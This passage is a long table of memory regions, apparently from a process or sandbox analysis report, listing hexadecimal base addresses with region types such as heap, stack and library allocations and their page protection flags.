page read and write
|
||
|
31E0000
|
trusted library allocation
|
page read and write
|
||
|
250000
|
heap
|
page read and write
|
||
|
36F3000
|
heap
|
page read and write
|
||
|
4D4D000
|
heap
|
page read and write
|
||
|
45DF000
|
heap
|
page read and write
|
||
|
420000
|
heap
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
23E6000
|
heap
|
page read and write
|
||
|
4F9C000
|
heap
|
page read and write
|
||
|
3093000
|
trusted library allocation
|
page read and write
|
||
|
1B29B000
|
stack
|
page read and write
|
||
|
376F000
|
heap
|
page read and write
|
||
|
3C2E000
|
stack
|
page read and write
|
||
|
5954000
|
heap
|
page read and write
|
||
|
596F000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
4D4D000
|
heap
|
page read and write
|
||
|
3723000
|
trusted library allocation
|
page read and write
|
||
|
277000
|
heap
|
page read and write
|
||
|
4F1F000
|
heap
|
page read and write
|
||
|
5968000
|
heap
|
page read and write
|
||
|
375A000
|
heap
|
page read and write
|
||
|
234000
|
heap
|
page read and write
|
||
|
47A5000
|
heap
|
page read and write
|
||
|
56C000
|
heap
|
page read and write
|
||
|
25CE000
|
stack
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
2D8000
|
heap
|
page read and write
|
||
|
3821000
|
heap
|
page read and write
|
||
|
4552000
|
heap
|
page read and write
|
||
|
1A5CB000
|
stack
|
page read and write
|
||
|
10C000
|
heap
|
page read and write
|
||
|
55B000
|
heap
|
page read and write
|
||
|
1A2D8000
|
stack
|
page read and write
|
||
|
7FE89A80000
|
trusted library allocation
|
page read and write
|
||
|
2C9000
|
heap
|
page read and write
|
||
|
7FE89A82000
|
trusted library allocation
|
page read and write
|
||
|
3810000
|
trusted library allocation
|
page read and write
|
||
|
1C224000
|
heap
|
page read and write
|
||
|
2DD000
|
heap
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
193000
|
stack
|
page read and write
|
||
|
1A8FD000
|
heap
|
page read and write
|
||
|
41F000
|
heap
|
page read and write
|
||
|
4682000
|
heap
|
page read and write
|
||
|
359000
|
heap
|
page read and write
|
||
|
4A98000
|
heap
|
page read and write
|
||
|
23B1000
|
heap
|
page read and write
|
||
|
463F000
|
heap
|
page read and write
|
||
|
4FC7000
|
heap
|
page read and write
|
||
|
4FA4000
|
heap
|
page read and write
|
||
|
7FE89A33000
|
trusted library allocation
|
page read and write
|
||
|
2F37000
|
trusted library allocation
|
page read and write
|
||
|
4A8F000
|
heap
|
page read and write
|
||
|
45C0000
|
heap
|
page read and write
|
||
|
388000
|
heap
|
page read and write
|
||
|
4535000
|
heap
|
page read and write
|
||
|
1D30000
|
trusted library allocation
|
page read and write
|
||
|
7FE898BB000
|
trusted library allocation
|
page read and write
|
||
|
2B8000
|
heap
|
page read and write
|
||
|
5964000
|
heap
|
page read and write
|
||
|
33F0000
|
direct allocation
|
page read and write
|
||
|
53FA000
|
heap
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
23FB000
|
heap
|
page read and write
|
||
|
3530000
|
heap
|
page read and write
|
||
|
463B000
|
heap
|
page read and write
|
||
|
370000
|
direct allocation
|
page read and write
|
||
|
17C000
|
heap
|
page read and write
|
||
|
514000
|
heap
|
page read and write
|
||
|
5F2000
|
heap
|
page read and write
|
||
|
3C30000
|
trusted library allocation
|
page read and write
|
||
|
1DA0000
|
trusted library allocation
|
page read and write
|
||
|
1C8BA000
|
stack
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
53FE000
|
heap
|
page read and write
|
||
|
1C36000
|
heap
|
page read and write
|
||
|
1AFFE000
|
stack
|
page read and write
|
||
|
3E6F000
|
stack
|
page read and write
|
||
|
403000
|
heap
|
page read and write
|
||
|
4FCD000
|
heap
|
page read and write
|
||
|
7FE89AA4000
|
trusted library allocation
|
page read and write
|
||
|
23A000
|
heap
|
page read and write
|
||
|
57A000
|
heap
|
page read and write
|
||
|
4F97000
|
heap
|
page read and write
|
||
|
4733000
|
heap
|
page read and write
|
||
|
1F70000
|
direct allocation
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
37E1000
|
heap
|
page read and write
|
||
|
596F000
|
heap
|
page read and write
|
||
|
56B8000
|
heap
|
page read and write
|
||
|
4F1F000
|
heap
|
page read and write
|
||
|
35EB000
|
trusted library allocation
|
page read and write
|
||
|
54F0000
|
heap
|
page read and write
|
||
|
3CD000
|
heap
|
page read and write
|
||
|
597000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
45CD000
|
heap
|
page read and write
|
||
|
1CE5000
|
heap
|
page read and write
|
||
|
1B0D6000
|
heap
|
page read and write
|
||
|
300000
|
heap
|
page read and write
|
||
|
1A65F000
|
stack
|
page read and write
|
||
|
1FA000
|
heap
|
page read and write
|
||
|
4F95000
|
heap
|
page read and write
|
||
|
3816000
|
heap
|
page read and write
|
||
|
31DA000
|
stack
|
page read and write
|
||
|
5409000
|
heap
|
page read and write
|
||
|
2551000
|
trusted library allocation
|
page read and write
|
||
|
34B2000
|
trusted library allocation
|
page read and write
|
||
|
377000
|
direct allocation
|
page read and write
|
||
|
589000
|
heap
|
page read and write
|
||
|
5EC000
|
heap
|
page read and write
|
||
|
7FE89960000
|
trusted library allocation
|
page execute and read and write
|
||
|
23E7000
|
heap
|
page read and write
|
||
|
50CC000
|
heap
|
page read and write
|
||
|
3FB0000
|
trusted library allocation
|
page read and write
|
||
|
4870000
|
trusted library allocation
|
page read and write
|
||
|
3D10000
|
trusted library allocation
|
page read and write
|
||
|
1A07E000
|
heap
|
page read and write
|
||
|
437000
|
heap
|
page read and write
|
||
|
45BF000
|
heap
|
page read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
1F90000
|
direct allocation
|
page read and write
|
||
|
2186000
|
heap
|
page read and write
|
||
|
4733000
|
heap
|
page read and write
|
||
|
473D000
|
heap
|
page read and write
|
||
|
4E1B000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
57E000
|
heap
|
page read and write
|
||
|
40F0000
|
trusted library allocation
|
page read and write
|
||
|
22F1000
|
trusted library allocation
|
page read and write
|
||
|
1AF4E000
|
stack
|
page read and write
|
||
|
27DE000
|
trusted library allocation
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
5407000
|
heap
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
39AE000
|
stack
|
page read and write
|
||
|
443000
|
heap
|
page read and write
|
||
|
540A000
|
heap
|
page read and write
|
||
|
4FCC000
|
heap
|
page read and write
|
||
|
1E1000
|
heap
|
page read and write
|
||
|
20EE000
|
stack
|
page read and write | page guard
|
||
|
540000
|
heap
|
page read and write
|
||
|
2831000
|
trusted library allocation
|
page read and write
|
||
|
5FF000
|
heap
|
page read and write
|
||
|
448000
|
heap
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
3880000
|
heap
|
page read and write
|
||
|
14F000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
1D56000
|
heap
|
page read and write
|
||
|
1E34000
|
heap
|
page read and write
|
||
|
388D000
|
stack
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
50BF000
|
heap
|
page read and write
|
||
|
40E8000
|
trusted library allocation
|
page read and write
|
||
|
45F9000
|
heap
|
page read and write
|
||
|
5867000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
4598000
|
heap
|
page read and write
|
||
|
36F3000
|
heap
|
page read and write
|
||
|
56AD000
|
heap
|
page read and write
|
||
|
3752000
|
heap
|
page read and write
|
||
|
5945000
|
heap
|
page read and write
|
||
|
4B2A000
|
heap
|
page read and write
|
||
|
596F000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
12100000
|
trusted library allocation
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
37D0000
|
trusted library allocation
|
page read and write
|
||
|
2F33000
|
trusted library allocation
|
page read and write
|
||
|
20C7000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
417000
|
heap
|
page read and write
|
||
|
5EF000
|
heap
|
page read and write
|
||
|
5947000
|
heap
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
1C430000
|
heap
|
page read and write
|
||
|
4731000
|
heap
|
page read and write
|
||
|
35DF000
|
trusted library allocation
|
page read and write
|
||
|
24A000
|
heap
|
page read and write
|
||
|
35D9000
|
trusted library allocation
|
page read and write
|
||
|
411000
|
heap
|
page read and write
|
||
|
7FE8993C000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B3F000
|
stack
|
page read and write
|
||
|
3C4000
|
heap
|
page read and write
|
||
|
27CC000
|
trusted library allocation
|
page read and write
|
||
|
353000
|
heap
|
page read and write
|
||
|
2CD5000
|
heap
|
page read and write
|
||
|
35EE000
|
trusted library allocation
|
page read and write
|
||
|
4598000
|
heap
|
page read and write
|
||
|
45B000
|
heap
|
page read and write
|
||
|
43B000
|
heap
|
page read and write
|
||
|
3C30000
|
trusted library allocation
|
page read and write
|
||
|
1C98F000
|
stack
|
page read and write
|
||
|
50B6000
|
heap
|
page read and write
|
||
|
3AD000
|
direct allocation
|
page read and write
|
||
|
1E0000
|
heap
|
page read and write
|
||
|
1B640000
|
heap
|
page read and write
|
||
|
3A4000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
1C67C000
|
stack
|
page read and write
|
||
|
1EE0000
|
heap
|
page read and write
|
||
|
7FE898B3000
|
trusted library allocation
|
page read and write
|
||
|
4F1C000
|
heap
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
567000
|
heap
|
page read and write
|
||
|
150000
|
trusted library allocation
|
page read and write
|
||
|
1B5B0000
|
heap
|
page read and write
|
||
|
1E40000
|
direct allocation
|
page read and write
|
||
|
1D1B000
|
heap
|
page read and write
|
||
|
C0000
|
heap
|
page read and write
|
||
|
32B0000
|
trusted library allocation
|
page read and write
|
||
|
579000
|
heap
|
page read and write
|
||
|
44D000
|
heap
|
page read and write
|
||
|
385000
|
heap
|
page read and write
|
||
|
5997000
|
heap
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
|
4B91000
|
heap
|
page read and write
|
||
|
3724000
|
trusted library allocation
|
page read and write
|
||
|
2CB000
|
heap
|
page read and write
|
||
|
37B0000
|
trusted library allocation
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
380000
|
heap
|
page read and write
|
||
|
23F1000
|
heap
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
376E000
|
heap
|
page read and write
|
||
|
26F000
|
heap
|
page read and write
|
||
|
33C000
|
heap
|
page read and write
|
||
|
1C70000
|
trusted library allocation
|
page read and write
|
||
|
45AF000
|
heap
|
page read and write
|
||
|
23F1000
|
heap
|
page read and write
|
||
|
130000
|
direct allocation
|
page read and write
|
||
|
35E7000
|
trusted library allocation
|
page read and write
|
||
|
2A3F000
|
stack
|
page read and write
|
||
|
2DD000
|
heap
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
480C000
|
heap
|
page read and write
|
||
|
5171000
|
trusted library allocation
|
page read and write
|
||
|
232000
|
stack
|
page read and write
|
||
|
1CC4000
|
heap
|
page read and write
|
||
|
2E2000
|
heap
|
page read and write
|
||
|
1C59F000
|
stack
|
page read and write
|
||
|
34A7000
|
trusted library allocation
|
page read and write
|
||
|
4ED0000
|
heap
|
page read and write
|
||
|
53F2000
|
heap
|
page read and write
|
||
|
1C6B0000
|
heap
|
page read and write
|
||
|
216000
|
heap
|
page read and write
|
||
|
35F0000
|
heap
|
page read and write
|
||
|
1B1000
|
heap
|
page read and write
|
||
|
1B48B000
|
stack
|
page read and write
|
||
|
3E6000
|
heap
|
page read and write
|
||
|
16B000
|
stack
|
page read and write
|
||
|
27A000
|
heap
|
page read and write
|
||
|
37B4000
|
heap
|
page read and write
|
||
|
472C000
|
heap
|
page read and write
|
||
|
4EC5000
|
heap
|
page read and write
|
||
|
4A50000
|
heap
|
page read and write
|
||
|
7FE89A84000
|
trusted library allocation
|
page read and write
|
||
|
596F000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
35E6000
|
trusted library allocation
|
page read and write
|
||
|
4598000
|
heap
|
page read and write
|
||
|
6239000
|
heap
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
2A0000
|
heap
|
page read and write
|
||
|
1B5AB000
|
heap
|
page read and write
|
||
|
112000
|
stack
|
page read and write
|
||
|
595C000
|
heap
|
page read and write
|
||
|
348000
|
stack
|
page read and write
|
||
|
392E000
|
stack
|
page read and write
|
||
|
54F0000
|
heap
|
page read and write
|
||
|
44FF000
|
stack
|
page read and write
|
||
|
403000
|
heap
|
page read and write
|
||
|
5953000
|
heap
|
page read and write
|
||
|
286000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
594A000
|
heap
|
page read and write
|
||
|
2F35000
|
trusted library allocation
|
page read and write
|
||
|
38B000
|
heap
|
page read and write
|
||
|
390000
|
direct allocation
|
page read and write
|
||
|
437000
|
heap
|
page read and write
|
||
|
5945000
|
heap
|
page read and write
|
||
|
3940000
|
heap
|
page read and write
|
||
|
5953000
|
heap
|
page read and write
|
||
|
85000
|
heap
|
page read and write
|
||
|
43B000
|
heap
|
page read and write
|
||
|
473D000
|
heap
|
page read and write
|
||
|
1C5C0000
|
heap
|
page read and write
|
||
|
12080000
|
trusted library allocation
|
page read and write
|
||
|
37DF000
|
stack
|
page read and write
|
||
|
2B0000
|
heap
|
page read and write
|
||
|
2F8000
|
heap
|
page read and write
|
||
|
5DC000
|
heap
|
page read and write
|
||
|
5999000
|
heap
|
page read and write
|
||
|
4F1F000
|
heap
|
page read and write
|
||
|
508000
|
heap
|
page read and write
|
||
|
4A8D000
|
heap
|
page read and write
|
||
|
6230000
|
heap
|
page read and write
|
||
|
2B8000
|
heap
|
page read and write
|
||
|
444000
|
heap
|
page read and write
|
||
|
328000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
179000
|
heap
|
page read and write
|
||
|
125000
|
stack
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
4500000
|
heap
|
page read and write
|
||
|
35EA000
|
trusted library allocation
|
page read and write
|
||
|
35D8000
|
trusted library allocation
|
page read and write
|
||
|
3B80000
|
trusted library allocation
|
page read and write
|
||
|
3E9000
|
heap
|
page read and write
|
||
|
595C000
|
heap
|
page read and write
|
||
|
463F000
|
heap
|
page read and write
|
||
|
4FA9000
|
heap
|
page read and write
|
||
|
596F000
|
heap
|
page read and write
|
||
|
443000
|
heap
|
page read and write
|
||
|
58C0000
|
heap
|
page read and write
|
||
|
3410000
|
direct allocation
|
page read and write
|
||
|
3F4000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
29F000
|
heap
|
page read and write
|
||
|
34A3000
|
trusted library allocation
|
page read and write
|
||
|
5945000
|
heap
|
page read and write
|
||
|
5949000
|
heap
|
page read and write
|
||
|
34B2000
|
trusted library allocation
|
page read and write
|
||
|
4CD000
|
heap
|
page read and write
|
||
|
1E3000
|
heap
|
page read and write
|
||
|
1B4FF000
|
stack
|
page read and write
|
||
|
3E7000
|
heap
|
page read and write
|
||
|
2A3000
|
heap
|
page read and write
|
||
|
1E60000
|
direct allocation
|
page read and write
|
||
|
1C20E000
|
stack
|
page read and write
|
||
|
3371000
|
trusted library allocation
|
page read and write
|
||
|
1C2C7000
|
heap
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
|
45F7000
|
heap
|
page read and write
|
||
|
4F17000
|
heap
|
page read and write
|
||
|
58B6000
|
heap
|
page read and write
|
||
|
1C1F5000
|
heap
|
page read and write
|
||
|
33D0000
|
direct allocation
|
page read and write
|
||
|
4C0000
|
heap
|
page read and write
|
||
|
342E000
|
trusted library allocation
|
page read and write
|
||
|
21B000
|
heap
|
page read and write
|
||
|
5409000
|
heap
|
page read and write
|
||
|
5408000
|
heap
|
page read and write
|
||
|
258000
|
heap
|
page read and write
|
||
|
50CE000
|
heap
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
4545000
|
heap
|
page read and write
|
||
|
1C2B0000
|
heap
|
page read and write
|
||
|
1A719000
|
stack
|
page read and write
|
||
|
4A8D000
|
heap
|
page read and write
|
||
|
4E1D000
|
heap
|
page read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
436000
|
heap
|
page read and write
|
||
|
1B10000
|
trusted library allocation
|
page read and write
|
||
|
20C000
|
heap
|
page read and write
|
||
|
1DC0000
|
heap
|
page read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
43B000
|
heap
|
page read and write
|
||
|
37B4000
|
heap
|
page read and write
|
||
|
1C2C2000
|
heap
|
page read and write
|
||
|
1CB0000
|
heap
|
page read and write
|
||
|
58C3000
|
heap
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
1D8E000
|
stack
|
page read and write | page guard
|
||
|
50C6000
|
heap
|
page read and write
|
||
|
AF000
|
heap
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
2DA000
|
heap
|
page read and write
|
||
|
3F4000
|
heap
|
page read and write
|
||
|
300000
|
heap
|
page read and write
|
||
|
414000
|
heap
|
page read and write
|
||
|
5968000
|
heap
|
page read and write
|
||
|
1B0D0000
|
heap
|
page read and write
|
||
|
4140000
|
trusted library allocation
|
page read and write
|
||
|
3830000
|
trusted library allocation
|
page read and write
|
||
|
2199000
|
stack
|
page read and write
|
||
|
480E000
|
heap
|
page read and write
|
||
|
2B3000
|
heap
|
page read and write
|
||
|
4735000
|
heap
|
page read and write
|
||
|
540A000
|
heap
|
page read and write
|
||
|
58BE000
|
heap
|
page read and write
|
||
|
1A720000
|
heap
|
page execute and read and write
|
||
|
2E2000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
5937000
|
heap
|
page read and write
|
||
|
3D7000
|
heap
|
page read and write
|
||
|
49F0000
|
trusted library allocation
|
page read and write
|
||
|
40D9000
|
trusted library allocation
|
page read and write
|
||
|
1C2E7000
|
heap
|
page read and write
|
||
|
1FB0000
|
direct allocation
|
page read and write
|
||
|
1B380000
|
heap
|
page read and write
|
||
|
53F0000
|
heap
|
page read and write
|
||
|
5409000
|
heap
|
page read and write
|
||
|
40CC000
|
stack
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
5AE000
|
heap
|
page read and write
|
||
|
1C90000
|
trusted library allocation
|
page read and write
|
||
|
6571000
|
trusted library allocation
|
page read and write
|
||
|
58C3000
|
heap
|
page read and write
|
||
|
34AA000
|
trusted library allocation
|
page read and write
|
||
|
7831000
|
trusted library allocation
|
page read and write
|
||
|
3EA000
|
heap
|
page read and write
|
||
|
36EF000
|
heap
|
page read and write
|
||
|
2D0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BA7000
|
trusted library allocation
|
page read and write
|
||
|
1AE000
|
heap
|
page read and write
|
||
|
1CD8000
|
heap
|
page execute and read and write
|
||
|
7FE89A88000
|
trusted library allocation
|
page read and write
|
||
|
7FE89930000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
41B000
|
heap
|
page read and write
|
||
|
548A000
|
heap
|
page read and write
|
||
|
5937000
|
heap
|
page read and write
|
||
|
3D60000
|
trusted library allocation
|
page read and write
|
||
|
4F7D000
|
heap
|
page read and write
|
||
|
4A10000
|
heap
|
page read and write
|
||
|
1E0000
|
heap
|
page read and write
|
||
|
4A92000
|
heap
|
page read and write
|
||
|
54F1000
|
heap
|
page read and write
|
||
|
3A0A000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
5CF000
|
heap
|
page read and write
|
||
|
4591000
|
heap
|
page read and write
|
||
|
224F000
|
stack
|
page read and write
|
||
|
34A1000
|
trusted library allocation
|
page read and write
|
||
|
4080000
|
trusted library allocation
|
page read and write
|
||
|
59E000
|
heap
|
page read and write
|
||
|
4591000
|
heap
|
page read and write
|
||
|
33A0000
|
trusted library allocation
|
page read and write
|
||
|
5D4000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
368000
|
stack
|
page read and write
|
||
|
247000
|
heap
|
page read and write
|
||
|
2931000
|
trusted library allocation
|
page read and write
|
||
|
1C76000
|
heap
|
page read and write
|
||
|
35D8000
|
trusted library allocation
|
page read and write
|
||
|
1B090000
|
heap
|
page read and write
|
||
|
2840000
|
heap
|
page read and write
|
||
|
1C315000
|
heap
|
page read and write
|
||
|
162000
|
heap
|
page read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
24F6000
|
trusted library allocation
|
page read and write
|
||
|
45FC000
|
heap
|
page read and write
|
||
|
3437000
|
direct allocation
|
page read and write
|
||
|
2411000
|
trusted library allocation
|
page read and write
|
||
|
1BF0000
|
heap
|
page read and write
|
||
|
462B000
|
heap
|
page read and write
|
||
|
5945000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
58C4000
|
heap
|
page read and write
|
||
|
5570000
|
heap
|
page read and write
|
||
|
1A136000
|
heap
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
1E7F000
|
stack
|
page read and write
|
||
|
36F000
|
heap
|
page read and write
|
||
|
38D000
|
heap
|
page read and write
|
||
|
4CED000
|
stack
|
page read and write
|
||
|
443000
|
heap
|
page read and write
|
||
|
384000
|
heap
|
page read and write
|
||
|
34AB000
|
trusted library allocation
|
page read and write
|
||
|
165000
|
stack
|
page read and write
|
||
|
286000
|
heap
|
page read and write
|
||
|
130000
|
trusted library allocation
|
page read and write
|
||
|
35E4000
|
trusted library allocation
|
page read and write
|
||
|
2B0000
|
heap
|
page read and write
|
||
|
450C000
|
heap
|
page read and write
|
||
|
3822000
|
heap
|
page read and write
|
||
|
375A000
|
heap
|
page read and write
|
||
|
1A986000
|
heap
|
page read and write
|
||
|
4600000
|
trusted library allocation
|
page read and write
|
||
|
1FF0000
|
heap
|
page execute and read and write
|
||
|
5968000
|
heap
|
page read and write
|
||
|
1A83E000
|
stack
|
page read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
|
1B5B4000
|
heap
|
page read and write
|
||
|
3443000
|
direct allocation
|
page read and write
|
||
|
26C0000
|
heap
|
page read and write
|
||
|
2271000
|
trusted library allocation
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
56D000
|
heap
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
5209000
|
heap
|
page read and write
|
||
|
480D000
|
heap
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
3BC000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
58C3000
|
heap
|
page read and write
|
||
|
35DE000
|
trusted library allocation
|
page read and write
|
||
|
1A0FD000
|
heap
|
page read and write
|
||
|
396000
|
heap
|
page read and write
|
||
|
7FE89A60000
|
trusted library allocation
|
page execute and read and write
|
||
|
3819000
|
heap
|
page read and write
|
||
|
50CA000
|
heap
|
page read and write
|
||
|
3B90000
|
trusted library allocation
|
page read and write
|
||
|
4F9C000
|
heap
|
page read and write
|
||
|
4FA2000
|
heap
|
page read and write
|
||
|
240F000
|
stack
|
page read and write
|
||
|
540A000
|
heap
|
page read and write
|
||
|
2624000
|
trusted library allocation
|
page read and write
|
||
|
1A0F0000
|
heap
|
page read and write
|
||
|
3BC000
|
heap
|
page read and write
|
||
|
3DE000
|
heap
|
page read and write
|
||
|
45BF000
|
heap
|
page read and write
|
||
|
1A724000
|
heap
|
page execute and read and write
|
||
|
3725000
|
trusted library allocation
|
page read and write
|
||
|
4610000
|
heap
|
page read and write
|
||
|
38D000
|
direct allocation
|
page read and write
|
||
|
7FE89A64000
|
trusted library allocation
|
page read and write
|
||
|
5010000
|
trusted library allocation
|
page read and write
|
||
|
4A9A000
|
heap
|
page read and write
|
||
|
56B8000
|
heap
|
page read and write
|
||
|
3E5000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
38B000
|
heap
|
page read and write
|
||
|
596F000
|
heap
|
page read and write
|
||
|
4734000
|
heap
|
page read and write
|
||
|
5939000
|
heap
|
page read and write
|
||
|
35DE000
|
trusted library allocation
|
page read and write
|
||
|
253000
|
heap
|
page read and write
|
||
|
42B0000
|
heap
|
page read and write
|
||
|
373A000
|
heap
|
page read and write
|
||
|
1FD7000
|
direct allocation
|
page read and write
|
||
|
4598000
|
heap
|
page read and write
|
||
|
4AA8000
|
heap
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
34AE000
|
trusted library allocation
|
page read and write
|
||
|
160000
|
trusted library allocation
|
page read and write
|
||
|
50B4000
|
heap
|
page read and write
|
||
|
3DD000
|
heap
|
page read and write
|
||
|
2AA000
|
heap
|
page read and write
|
||
|
23FA000
|
heap
|
page read and write
|
||
|
7FE898A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
27A000
|
heap
|
page read and write
|
||
|
239000
|
heap
|
page read and write
|
||
|
3ABF000
|
stack
|
page read and write
|
||
|
3E0000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
34A9000
|
trusted library allocation
|
page read and write
|
||
|
4A9A000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3DC000
|
heap
|
page read and write
|
||
|
37E000
|
heap
|
page read and write
|
||
|
373000
|
direct allocation
|
page read and write
|
||
|
3E5000
|
heap
|
page read and write
|
||
|
3819000
|
heap
|
page read and write
|
||
|
3E3000
|
heap
|
page read and write
|
||
|
437000
|
heap
|
page read and write
|
||
|
1C920000
|
heap
|
page read and write
|
||
|
12B000
|
stack
|
page read and write
|
||
|
1F20000
|
heap
|
page read and write
|
||
|
C7000
|
heap
|
page read and write
|
||
|
216000
|
heap
|
page read and write
|
||
|
2D0B000
|
heap
|
page read and write
|
||
|
1E30000
|
heap
|
page read and write
|
||
|
218000
|
heap
|
page read and write
|
||
|
34A5000
|
trusted library allocation
|
page read and write
|
||
|
24D0000
|
heap
|
page execute and read and write
|
||
|
217000
|
heap
|
page read and write
|
||
|
45F9000
|
heap
|
page read and write
|
||
|
596C000
|
heap
|
page read and write
|
||
|
4B91000
|
heap
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
480B000
|
heap
|
page read and write
|
||
|
4AA7000
|
heap
|
page read and write
|
||
|
4FA4000
|
heap
|
page read and write
|
||
|
1AF9F000
|
stack
|
page read and write
|
||
|
4E1D000
|
heap
|
page read and write
|
||
|
50CE000
|
heap
|
page read and write
|
||
|
34A6000
|
trusted library allocation
|
page read and write
|
||
|
595C000
|
heap
|
page read and write
|
||
|
7FE89956000
|
trusted library allocation
|
page read and write
|
||
|
50C4000
|
heap
|
page read and write
|
||
|
7FE89A57000
|
trusted library allocation
|
page read and write
|
||
|
4FC7000
|
heap
|
page read and write
|
||
|
1A8C0000
|
heap
|
page read and write
|
||
|
300000
|
heap
|
page read and write
|
||
|
35EA000
|
trusted library allocation
|
page read and write
|
||
|
5A7000
|
heap
|
page read and write
|
||
|
373F000
|
stack
|
page read and write
|
||
|
1C60000
|
heap
|
page read and write
|
||
|
23A000
|
heap
|
page read and write
|
||
|
53EE000
|
heap
|
page read and write
|
||
|
320000
|
heap
|
page read and write
|
||
|
4D0C000
|
heap
|
page read and write
|
||
|
23C000
|
heap
|
page read and write
|
||
|
3566000
|
heap
|
page read and write
|
||
|
3EB000
|
heap
|
page read and write
|
||
|
480E000
|
heap
|
page read and write
|
||
|
41B000
|
heap
|
page read and write
|
||
|
17C000
|
heap
|
page read and write
|
||
|
3F30000
|
heap
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
37B2000
|
heap
|
page read and write
|
||
|
37D000
|
heap
|
page read and write
|
||
|
3BC000
|
heap
|
page read and write
|
||
|
45F3000
|
heap
|
page read and write
|
||
|
238000
|
heap
|
page read and write
|
||
|
1D6000
|
heap
|
page read and write
|
||
|
2B0000
|
trusted library allocation
|
page read and write
|
||
|
3A7000
|
heap
|
page read and write
|
||
|
382A000
|
heap
|
page read and write
|
||
|
592E000
|
heap
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
7FE898AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
3EC000
|
heap
|
page read and write
|
||
|
5E2000
|
heap
|
page read and write
|
||
|
4F8000
|
heap
|
page read and write
|
||
|
4AA8000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1A0C4000
|
heap
|
page read and write
|
||
|
1B0CE000
|
stack
|
page read and write
|
||
|
4D5F000
|
heap
|
page read and write
|
||
|
79000
|
heap
|
page read and write
|
||
|
292E000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A5C000
|
trusted library allocation
|
page read and write
|
